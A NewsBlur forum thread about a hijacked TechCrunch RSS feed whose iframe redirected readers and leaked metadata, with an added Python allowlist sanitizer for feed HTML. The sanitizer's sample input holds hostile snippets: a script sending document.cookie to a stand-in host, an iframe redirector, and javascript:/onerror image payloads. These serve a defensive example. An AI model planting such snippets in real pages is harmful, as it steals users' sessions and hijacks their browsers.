Protection against Browser Hijack from weird Techcrunch RSS feed

A couple days ago, when browsing through my Newsblur, I was being spontaneously redirected to a dodgy site. Looking into it, it seems the RSS is loading an iFrame which is triggering a URL load for the parent browser with a bunch of my meta data in the URL params.

Turns out, I added the Techcrunch RSS by putting the plain website into the ‘Add a new site’ and choosing an autocomplete option. I don’t know if it’s changed since, but the feed URL for it in my Newsblur is now (DO NOT CLICK) TechCrunch (DO NOT CLICK).

This is obviously malicious, and the feed shouldn’t be trusted any more, so I’ll remove it. However, I’d like to see some kind of protection in Newsblur to strip iFrames or even arbitrary Javascript, and perhaps protect against malicious feeds.

I have a screen recording of the recreation which I can give to you privately, Samuel, if you want it.

Oh interesting, I subscribe to that feed as well and I didn’t see it because I had the stories hidden. I’ll fix this one off, but as for future protection, I sense a growing need to have something. We strip most everything from RSS feeds except iframes, where we explicitly allow it. It does offer protection against your data, even though it does force that icky redirect, but the offending website can’t access your data.

Here’s the code that allows for iframes:

But I’ll fix this site and get the main TechCrunch feed url back to normal. Thanks for letting me know!

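The thread's point is that an RSS reader renders untrusted HTML, so the sanitizer's allowlist decides what a hijacked feed can do: a story that carries an iframe can navigate the whole page, and a script tag or an on* handler can read whatever the page exposes. The following allowlist sanitizer is an added example written for this thread; it is not NewsBlur's code (the snippet Samuel refers to above is not reproduced here) and does not assume anything about NewsBlur's internals. It uses only the Python standard library, drops iframe, script, object and embed together with their contents, keeps only a small set of tags and attributes, and refuses href/src values whose scheme is not http or https. The `SAMPLE_STORY` input is constructed for the example, modelled on the behaviour reported in the first post.

```python
"""Allowlist HTML sanitizer for feed stories (added example, not NewsBlur's code)."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags that may survive in a rendered story. Everything else is dropped;
# iframe is deliberately NOT on this list.
ALLOWED_TAGS = {
    "p", "br", "a", "img", "b", "strong", "i", "em", "u", "s",
    "ul", "ol", "li", "blockquote", "code", "pre", "h1", "h2", "h3",
    "h4", "h5", "h6", "table", "thead", "tbody", "tr", "th", "td", "hr",
}
# Tags whose entire content is discarded, not just the tag itself.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed", "noscript"}
# Per-tag attribute allowlist: no on* handlers, no style, no target.
ALLOWED_ATTRS = {
    "a": {"href", "title"},
    "img": {"src", "alt", "title", "width", "height"},
}
VOID_TAGS = {"br", "img", "hr"}
SAFE_SCHEMES = {"http", "https"}


def _safe_url(value):
    """Accept only http(s) or scheme-less (relative) URLs; reject javascript:, data:, etc."""
    scheme = urlparse(value.strip()).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


class FeedSanitizer(HTMLParser):
    """Re-emits only allowlisted tags/attributes; skips dangerous subtrees."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._drop_depth = 0  # > 0 while inside script/iframe/object/...

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self._drop_depth += 1  # swallow everything until the matching end tag
            return
        if self._drop_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag, keep its text content
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onload=, onerror=, onclick=, style=, ...
            if name in ("href", "src") and (value is None or not _safe_url(value)):
                continue  # drops javascript: and data: URLs
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            return  # a self-closing <iframe/> has no content to skip
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            if self._drop_depth:
                self._drop_depth -= 1
            return
        if self._drop_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._drop_depth:
            self.out.append(escape(data, quote=False))  # re-escape decoded text


def sanitize_feed_html(html):
    """Return a cleaned copy of one story's HTML."""
    parser = FeedSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# Constructed sample story: a framed redirector, an inline script that
# leaks document data into a URL, and an image with a handler attribute.
SAMPLE_STORY = (
    '<p>Read more on <a href="https://example.com/post" onclick="steal()">the site</a>.</p>'
    '<iframe src="https://redirector.example/?ref=me"></iframe>'
    '<script>top.location = "https://redirector.example/?d=" + document.cookie;</script>'
    '<img src="javascript:alert(1)" onerror="alert(1)" alt="pic">'
)

if __name__ == "__main__":
    print(sanitize_feed_html(SAMPLE_STORY))
```

The tag allowlist is the design choice that matters: a denylist of known-bad tags misses the next one, whereas an allowlist only ever grows when someone decides a tag is safe. If a reader does choose to keep iframes, as Samuel describes, the damage a hijacked feed can do is bounded by rendering them with a `sandbox` attribute that omits `allow-top-navigation`, which stops the frame from redirecting the parent page; stripping them altogether, as above, is the simpler policy.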

Did you get the feed itself fixed? https://newsblur.com/site/12/techcrunch is still definitely the hijacked feed. I’m starting to think they hijacked the actual Feedburner feed. The correct URL now looks like it should be https://techcrunch.com/feed

Thanks for reminding me, just fixed the feed as well.